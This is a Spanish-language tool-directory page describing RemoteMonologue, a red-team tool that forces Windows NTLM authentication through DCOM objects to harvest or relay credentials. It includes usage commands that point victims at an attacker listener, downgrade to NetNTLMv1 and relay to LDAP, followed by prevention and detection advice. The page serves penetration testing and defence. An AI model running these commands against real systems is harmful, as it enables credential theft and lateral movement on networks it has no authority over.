Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RemoteMonologue — Armando DCOM para coerciones de autenticación NTLM | Kitploit
Herramientas/GitHubGitHub/xforcered/remotemonologue
Ataques de ContraseñasExplotaciónMovimiento LateralRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Armando DCOM para coerciones de autenticación NTLM

Ver Repositorio
27522hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RemoteMonologue

RemoteMonologue es una técnica de recolección de credenciales de Windows que permite comprometer usuarios de forma remota aprovechando la clave RunAs del usuario interactivo y forzando autenticaciones NTLM mediante DCOM.

Lea RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions de X-Force Red para obtener información detallada.

Características

🔹 Coerción de autenticación mediante DCOM (-dcom)

  • Apunta a cuatro objetos DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) para desencadenar una autenticación NTLM contra un listener específico (-auth-to).

🔹 Spraying de credenciales (-spray)

  • Valida credenciales en múltiples sistemas mientras también captura credenciales de usuario.

🔹 Ataque de degradación NetNTLMv1 (-downgrade)

  • Obliga a los objetivos a usar NTLMv1, facilitando el descifrado y la retransmisión de credenciales.

🔹 Abuso del servicio WebClient (-webclient)

  • Habilita el servicio WebClient para facilitar la coerción de autenticación basada en HTTP.

🔹 Enumeración de usuarios (-query)

  • Identifica usuarios con una sesión activa en el sistema objetivo.

Nota: Se requieren privilegios de administrador local en el sistema objetivo.

Configuración

root@kitploit:~
pip install impacket

Ejemplos

A continuación se muestra un ejemplo de ejecución de RemoteMonologue con el ataque de degradación NetNTLMv1 y usando Responder como listener. Por defecto, si no se especifica una opción DCOM, la herramienta usa el objeto DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

A continuación se muestra otro ejemplo, esta vez el ataque se ejecuta usando el objeto DCOM FileSystemImage y habilitando el servicio WebClient para obtener una autenticación HTTP, que luego se retransmite a LDAP usando ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Consideraciones Defensivas

Para protegerse contra estas técnicas y detectarlas, se pueden implementar varias medidas preventivas y de detección.

Medidas preventivas:

  1. Habilite la firma LDAP y el enlace de canal: Configure la aplicación de la firma LDAP y el enlace de canal en los controladores de dominio para proteger el endpoint LDAP de ataques de retransmisión. Nota: Esta configuración se aplicará de forma predeterminada a partir de Windows Server 2025.

  2. Actualice a las versiones más recientes de Windows: Actualice los servidores a Windows Server 2025 y las estaciones de trabajo a Windows 11 versión 24H2 para mitigar los ataques de degradación NetNTLM, ya que NTLMv1 se ha eliminado en estas versiones.

  3. Aplique la firma SMB: Habilite y aplique la firma SMB en los servidores Windows para prevenir ataques de retransmisión SMB.

  4. Implemente políticas de contraseñas seguras: Aplique requisitos de contraseñas seguras para que los ataques de descifrado de contraseñas sean más difíciles.

Oportunidades de detección:

  1. Supervise el acceso remoto a los objetos DCOM: Realice un seguimiento del acceso a los objetos DCOM afectados y a sus Propiedades y Métodos específicos para identificar actividad inusual.

  2. Supervise las modificaciones del registro: Supervise los cambios en las claves de registro RunAs y LmCompatibilityLevel.

  3. Realice un seguimiento de la actividad del servicio WebClient: Supervise los casos en los que el servicio WebClient se habilita de forma remota, ya que esto se utiliza para facilitar las autenticaciones NTLM basadas en HTTP.

Descargar herramienta